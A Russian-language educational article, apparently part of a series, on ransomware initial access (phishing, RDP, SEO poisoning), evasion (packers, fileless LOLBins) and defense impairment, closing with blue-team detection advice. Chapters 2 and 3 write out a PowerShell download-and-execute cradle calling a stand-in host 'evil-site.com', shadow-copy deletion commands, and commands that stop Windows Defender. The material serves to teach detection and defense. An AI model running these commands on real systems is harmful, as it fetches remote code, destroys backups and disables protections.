Векторы вторжения и техники уклонения: Как Ransomware доставляет полезную нагрузку (Часть 2)

В первой части мы разобрали анатомию кода шифровальщика: как выглядит "движок" зловреда, отвечающий за поиск файлов и криптографические операции. Однако самый совершенный код бесполезен, если он не может попасть в целевую систему и запуститься.

Этот материал посвящен этапам Initial Access (Первоначальный доступ), Execution (Выполнение) и Defense Evasion (Обход защиты). Основываясь на данных отчётов ENISA, Veeam, Moxfive и Palo Alto Networks за 2025–2026 годы, мы проанализируем, как современные APT-группировки и RaaS-операторы (Ransomware-as-a-Service) обходят периметр, используют легитимные инструменты против администраторов и почему классические антивирусы проигрывают эту битву.

Мы рассмотрим эволюцию тактик доставки: от массовых фишинговых рассылок до точечной компрометации через RDP, а также разберем, как именно зловреды "ослепляют" системы защиты перед нанесением удара.

Важное предупреждение

Дисклеймер:
Данная статья носит исключительно образовательный и исследовательский характер. Примеры команд, техник обхода антивирусов и методов доставки рассматриваются для понимания тактик атакующих (TTPs) с целью настройки средств защиты (EDR, SIEM, AV).
Использование описанных методов для несанкционированного доступа к информационным системам является уголовным преступлением. Тестирование должно проводиться только в изолированных лабораторных средах.

Глава 1: Векторы доставки (Initial Access)

Попадание вредоносного ПО на конечную точку (Endpoint) — это критический момент атаки. В 2025 году мы наблюдаем рост общего числа атак на 36–47%. Атакующие действуют оппортунистически, комбинируя социальную инженерию с эксплуатацией технических уязвимостей.

1. Фишинг: Доминирование человеческого фактора

Несмотря на развитие технологий фильтрации почты, фишинг остается вектором №1, обеспечивая около 60% первоначальных доступов (по данным ENISA 2025). Эволюция здесь идет не в сторону сложности кода, а в сторону качества социальной инженерии (Spear Phishing).

Механика атаки:
Письмо маскируется под критически важный бизнес-контекст: неоплаченный счет, повестка в суд, уведомление от налоговой или срочный документ от "генерального директора".

• Weaponized Documents (VBA Macros): Классическая схема. Жертва получает файл .docx или .xlsx. При открытии документ просит включить содержимое ("Enable Content"). Внутри скрыт VBA-макрос, который запускает процесс загрузки основного тела вируса.
  • Техническая деталь: Часто используется техника "VBA Stomping" (сохранение скомпилированного p-code без исходного кода макроса) для обхода статического анализа.
• HTML Smuggling: Вложение — это HTML-файл. При открытии в браузере JavaScript локально собирает payload из закодированной строки (Base64) и инициирует скачивание на диск, обходя сетевые шлюзы безопасности, так как файл "создается" уже внутри периметра.
• OneNote (.one) и PDF: В ответ на блокировку макросов Microsoft, атакующие стали использовать файлы OneNote со встроенными скриптами или PDF со ссылками на вредоносные ресурсы.

2. Компрометация удаленного доступа (RDP/VPN)

Пандемия удаленной работы открыла двери, которые никто не закрыл. В отчетах Veeam и Moxfive эксплуатация служб удаленного доступа (Remote Desktop Protocol и VPN) занимает лидирующие позиции. Это любимый метод таких групп, как Akira и MedusaLocker.

Как это происходит:

• Brute-Force & Password Spraying: Атака методом перебора паролей на открытые в интернет порты (3389).
• Initial Access Brokers (IABs): Операторы шифровальщиков редко сами ломают RDP. Они покупают доступы у брокеров на теневых форумах. Эти учетные данные часто утекают через инфостилеры (Infostealers) — трояны, ворующие сохраненные пароли из браузеров сотрудников.
• Отсутствие MFA: Главная причина успеха — отсутствие многофакторной аутентификации на VPN-шлюзах и RDP-серверах.

3. Malicious Downloads и SEO Poisoning

Пользователи часто сами скачивают зловредов, думая, что загружают полезный софт.

• SEO Poisoning: Атакующие выводят вредоносные сайты в топ выдачи Google по запросам вроде "скачать WinRAR бесплатно" или "Zoom corporate install".
• Fake Software/Cracked Apps: Под видом активаторов ("кряков") или системных утилит скрываются загрузчики (Loaders), такие как GootLoader или Yellow Cockatoo, которые затем подтягивают Ransomware.

Глава 2: Искусство быть невидимым (Evasion Techniques)

Как только payload попадает на диск, начинается гонка со временем. Задача зловреда — запуститься и закрепиться до того, как его обнаружит антивирус или EDR (Endpoint Detection and Response). Для этого используются техники уклонения (Defense Evasion).

1. Обфускация и упаковка (Packers & Crypters)

Статический сигнатурный анализ (сравнение хэша файла с базой известных вирусов) давно мертв. Атакующие используют упаковщики, которые меняют структуру файла, сохраняя его функциональность. Файл на диске выглядит как "мусор", но при запуске распаковывается прямо в оперативную память.

Популярные инструменты в 2025 году:

• UPX (Ultimate Packer for eXecutables):
  Самый известный open-source упаковщик. Он сжимает исполняемый файл.
  • Нюанс: UPX легко распаковывается (команда upx -d), и большинство антивирусов умеют заглядывать "внутрь" UPX. Однако злоумышленники часто модифицируют заголовки UPX, чтобы сломать стандартные распаковщики и затруднить анализ.
• Themida / WinLicense:
  Коммерческие протекторы высокого уровня. Они используют продвинутые техники:
  • Anti-Debugging: Пытаются обнаружить, что их анализируют в отладчике (например, x64dbg), и аварийно завершают работу.
  • Virtualization: Часть кода исполняется не процессором напрямую, а через виртуальную машину внутри протектора, что превращает реверс-инжиниринг в ад.
• VMProtect:
  Считается одним из самых сложных для анализа. Использует мутацию кода (изменение инструкций процессора на эквивалентные, но запутанные) и виртуализацию.
• Custom FUD Crypters:
  В даркнете продаются услуги криптования (FUD — Fully Undetectable). Это уникальные алгоритмы, гарантирующие 0 детектов на VirusTotal в момент продажи.

Вывод для защиты: Статический анализ бесполезен против коммерческих протекторов. Необходим динамический анализ (Sandbox), который запускает файл в безопасной среде и смотрит на его поведение, а не на код.

2. Бесфайловые техники (Fileless Malware)

Зачем записывать вредоносный .exe на диск, где его может просканировать антивирус, если можно выполнить код прямо в памяти? Эта концепция лежит в основе "бесфайловых" атак.

Living Off the Land (LOLBins):
Атакующие используют легитимные утилиты Windows для вредоносных целей. Самый популярный инструмент — PowerShell. Он установлен везде, доверен системой и обладает мощнейшими возможностями администрирования.

Пример Fileless-загрузчика:
Вместо файла жертва запускает скрипт, который выполняет команду:

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://evil-site.com/payload.ps1')"

Разбор:

• -W Hidden: Окно консоли не появляется, пользователь ничего не видит.
• -Exec Bypass: Игнорирование политики выполнения скриптов.
• IEX (Invoke-Expression): Выполняет строку, скачанную из интернета, прямо в памяти. Файл payload.ps1 никогда не сохраняется на жесткий диск.

Другие опасные LOLBins:

• mshta.exe: Запуск вредоносных HTA-приложений.
• rundll32.exe: Запуск вредоносных DLL.
• wmic.exe: Использование WMI для запуска процессов или разведки.

Глава 3: Нейтрализация защиты (Impairing Defenses)

Перед началом шифрования (фаза Impact) современный Ransomware обязан "расчистить поле". Если начать шифрование при работающем EDR или наличии резервных копий, атака провалится.

1. Уничтожение путей отхода (VSS)

Windows имеет встроенный механизм теневого копирования (Volume Shadow Copy Service - VSS), позволяющий откатить файлы к предыдущим версиям. Это первая цель шифровальщика.

Команды уничтожения:
Атакующий (или скрипт) пытается выполнить следующие команды от имени администратора:

vssadmin.exe Delete Shadows /All /Quiet

• /All: Удалить все копии.
• /Quiet: Без подтверждения и вывода сообщений.

Альтернативные методы (если vssadmin мониторится):

wbadmin Delete Catalog -quiet

Или изменение размера хранилища теней до минимума, что вызывает удаление старых копий:

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

PowerShell-вариант (через WMI):

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

2. Ослепление сенсоров (Service Kill)

Зловред пытается остановить службы безопасности, антивирусы, сервисы резервного копирования и базы данных (чтобы снять блокировку с файлов .mdf/.ldf или .sql).

Примеры "грубой силы":

net stop "Windows Defender"
sc stop WinDefend
taskkill /f /im MSASCui.exe

Более изощренные методы включают:

• BYOVD (Bring Your Own Vulnerable Driver): Злоумышленники устанавливают легитимный, но уязвимый драйвер (например, от старого античита или утилиты разгона), и через него отключают защищенные процессы EDR в режиме ядра (Kernel mode), куда обычный администратор доступа не имеет.
• Unload Antivirus Modules: Попытка выгрузить DLL-библиотеки защиты из памяти.

Глава 4: Blue Team. Стратегии обнаружения

Как противостоять угрозам, которые живут в памяти, шифруют трафик и используют легитимные инструменты администрирования? Ответ кроется в переходе от сигнатурного поиска к поведенческому анализу (Behavioral Analysis).

Что искать в логах и EDR

EDR-решения — это "черные ящики" для конечных точек. Они записывают телеметрию происходящего. Вот ключевые индикаторы компрометации (IoC), на которые должен реагировать SOC.

1. Детектирование этапа "Поиск и шифрование"

• High Entropy Write: Если процесс начинает массово перезаписывать файлы, и энтропия (случайность данных) этих файлов резко возрастает — это 99% признак шифрования.
• Canary Files (Файлы-ловушки): Размещение скрытых файлов в папках (например, A_Trap_File.docx). Легитимные пользователи их не трогают. Если файл изменен — тревога.
• Suspicious Extensions: Появление файлов .locked, .enc, .crypted в сочетании с файлами README_DECRYPT.txt.

2. Детектирование PowerShell-активности

PowerShell — мощный, но шумный инструмент, если включить логирование.

• Ключевые флаги: Мониторинг запуска powershell.exe с аргументами -EncodedCommand (или -e, -enc). Злоумышленники кодируют команды в Base64, чтобы скрыть их от глаз.
• Download Cradles: Паттерны Net.WebClient, DownloadString, Invoke-WebRequest в командной строке.
• Parent-Child Relationships: Процесс winword.exe (Word) или excel.exe никогда не должен порождать powershell.exe или cmd.exe. Это верный признак макрос-атаки.
• Logging: Обязательное включение Script Block Logging (Event ID 4104). Это позволяет видеть деобфусцированный код, который реально выполняется.

3. Детектирование саботажа защиты

• VSS Tampering: Любой вызов vssadmin delete shadows должен генерировать критический алерт. Легитимные администраторы делают это крайне редко.
• Event IDs:
  • 4688: Создание нового процесса (включая командную строку).
  • 7036 / 4697: Остановка службы или установка новой службы.
  • Sysmon Event ID 1: Детальная информация о создании процессов.

Ландшафт угроз 2025–2026 годов показывает, что шифровальщики становятся "умнее", тише и опаснее. Они перешли от простых исполняемых файлов к сложным fileless-атакам, использующим инфраструктуру самой жертвы (Living Off the Land) для уничтожения защиты.

Защита сегодня — это не просто антивирус. Это многослойная стратегия:

• MFA везде: Особенно на RDP и VPN.
• EDR с поведенческим анализом: Способный остановить процесс по факту подозрительных действий, а не по имени файла.
• Неизменяемые бэкапы (Immutable Backups): Резервные копии, которые физически невозможно удалить или зашифровать с консоли администратора (хранение на S3 с Object Lock или оффлайн-ленты).

Понимание этих механизмов — первый шаг к построению надежной обороны (Defensive Security). В следующей части, если это будет интересно, мы можем разобрать работу C2 (Command and Control) серверов и механизмы Data Exfiltration (кражи данных) перед шифрованием.